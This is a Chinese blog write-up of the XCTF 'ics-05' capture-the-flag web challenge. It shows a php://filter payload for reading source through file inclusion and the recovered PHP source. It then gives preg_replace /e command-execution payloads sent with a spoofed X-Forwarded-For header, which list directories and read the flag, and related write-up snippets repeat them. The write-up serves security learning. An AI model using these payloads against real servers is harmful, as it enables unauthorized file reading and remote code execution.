攻防世界-高手进阶区之ics-05

最新推荐文章于 2024-12-26 21:39:46 发布
最新推荐文章于 2024-12-26 21:39:46 发布
阅读量341 收藏 1
点赞数
分类专栏: ctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Sacrifice_li/article/details/106699682
版权

进来页面是:

然后用nikto 扫描了一下:

它提示说是任何一个攻击者都可以任意读取文件:

那么就尝试一下读取页面源码:

index.php?page=php://filter/read=convert.base64-encode/resource=index.php

然后就去转码一下得到了:

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设备名', templet: '#nameTpl' },
                     { field: 'area', title: '区域' },
                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

 

重点在于这里:

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

preg_replace(),函数有一个执行漏洞,即在pattern为/e的模式下,当subject和pattern相同时,会执行repalcement中的代码:

所以可以构造 pat=/123/e&rep=system("ls")&sub=123

即可成功执行system(“ls”),这里注意要添加XFF头

然后就知道了s3chahahaDir这个文件不大对,就进去看看有什么

这里有一个 &&需要用上,所以需要构造的rep为system("cd+s3chahahaDir%26%26ls"),可以看到里面有flag目录。

%26是&的url编码 用+代替空格

 

然后进flag里面看有什么:

system("cd+s3chahahaDir/flag%26%26ls")

有一个flag.php,然后就去用cat查看即可得到flag:

 

 

写在最后:

记录一下preg_replace的用法:

preg_repalce(pattern,repalcement,subject)

pattern:搜索模式,是一个正则

repalcement:是替换的字符串或者字符串数组

subject:待替换的内容

 

如果pattern中带着/e,并且pattern和subject的内容一致,则会直接执行repalcement的代码

攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1421
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
攻防世界ics-05(PHP伪协议+代码审计+Linux指令)
2302_79800344的博客
04-08 1973
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
攻防世界-ics-05
weixin_46784800的博客
11-24 2835
ics-05题php伪协议题目分析:preg_replace函数漏洞: php伪协议 常用方式: ?file=php://filter/read=convert.base64-encode/resource=index.php 用来查看index.php的源码。 题目分析: 进入后,点击设备维护中心(只有这一个可以点) 查看源代码,可以看见存在一个参数为page,就在“云平台设备维护中心”: 点击该处即可发现自己发现了新世界: 首先判断是否存在文件包含漏洞: /index.php?page={{1+
攻防世界——ics-05
m0_62063669的博客
06-21 2682
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界XCTF:ics-05
末初 - mochu7
03-06 1377
根据提示来到设备维护中心 查看源码可以发现这里隐藏了个超链接变量传参,看到变量传参,有可能存在文件包含漏洞读取源码,然后这个站又是php的站,那么使用php伪协议读取源码: ?page=php://filter/read=convert.base64-encode/resource=index.php 出现了base64编码过的源码,使用base64解码后源码如下: <?php err...
攻防世界 web高手进阶 8分题 ics-02
闵行小鱼塘
10-04 655
继续ctf的旅程,开始攻防世界web高手进阶的8分题,本文是ics-02的writeup
攻防世界-web高手进阶
zji
04-25 6888
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界 web高手进阶 4分题(fakebook、ics-04、ics-05、FlatScience)
闵行小鱼塘
07-16 639
继续ctf的旅程,攻防世界web高手进阶的4分题:fakebook、ics-04、ics-05、FlatScience
攻防世界 web高手进阶 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 886
继续ctf的旅程,攻防世界web高手进阶的6分题:ics-07、unfinish、i-got-id-200
攻防世界高手进阶通关教程(2)
玄道的网安博客
05-16 2887
我们就直接开始吧 web2 源码给出了加密后的字符串,我们解密即可 代码块 import base64 def python_decode(string): zimu = "abcdefghijklmnopqrstuvwxyz" rot_13 ="" for i in string: if i.isdigit(): rot_13 += i else: try:
攻防世界-web-ics-05
最新发布
wyjcxyyy的博客
12-26 721
然而,如果 && 在URL中没有被正确解码,或者在某些情况下被解释为URL的一部分而不是命令的一部分,那么它可能不会被传递给 system 函数,因此不会有回显。访问flag.php?pat=/abc/e&rep=system("ls")&sub=abc,sub和pat相同替换后有/e直接执行系统命令。:可以是一个字符串或字符串数组,表示要搜索的模式,可以是一个正则表达式。
攻防世界-Web高手进阶-ics-05
feng的博客
09-05 557
这是涉及文件包含、PHP危险函数中的preg_replace()和代码审计的一个题目
攻防世界web——ics05
manerzi的博客
10-24 983
攻防世界web——ics05
[wp] 攻防世界 ics-05
MercyLin的博客
09-06 1330
进入题目发现也只有设备维护中心的选项可以点 page传的参数在页面会有回显,fuzz一下:
攻防世界ics-5wp
T19er的博客
07-10 3027
0x01 ics-5 浏览只有一个index页面,想到down源码,无果。 查看源代码发现有个page参数可以传值,利用LFI来查看源码。 /index.php?page=php://filter/read=convert.base64-encode/resource=index.php 读到base64加密的源码 PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNl...
攻防世界web进阶ics-05 详细wp
zhwho的博客
09-10 4929
攻防世界web进阶ics-05 wp 题目网站 根据题目提示选择设备维护中心,或者简单粗暴的全都点一遍,发现也只有设备维护中心能点开 打开后 F12 调网页源码 查看后发现 ?page=index 有page这个get参数 自然联想到可能存在利用文件包含读取网页源码的漏洞 这里给出利用php内置filter协议读取文件的代码 ?page=php://filter/read=convert....
攻防世界 ics-05
akxnxbshai的博客
01-26 982
ics-05 最佳Writeup由划水大队——Mke • Mke2fs提供 难度系数: 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 审题,打开网页后直接找到设备维修中心 点击一下云平台设备维修中心 发现上方GET进去了一个page,想到利用伪协议来得到全部的代码详情 Base64解密得到 <?php error_reporting(0); @session_start(); posix.
攻防世界】十七、ics-05
Hi~ 土拨鼠
10-12 2018
步骤 打开题目场景,根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数: 而且参数的内容还会在页面之中显示,尝试看有没有xss,失败: 看来不是这方面的考题,尝试输入index.php,发现返回Ok: 这里还没有看出来是啥,然后又尝试输入index.html,这才恍然大悟这块有文件包含: 既然是文件包含我们就尝试来利用它,尝试使用伪协议php://,它包含两个子协议,功能不同。.
攻防世界ics-06
08-12
对不起,你提供的引用内容没有包含任何问题。请提供一个明确的问题,我将很乐意帮助你回答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [攻防世界--ics-06](https://blog.youkuaiyun.com/m0_67467924/article/details/129679123)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [攻防世界Webics-06、unserialize3、supersqli”题解](https://blog.youkuaiyun.com/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值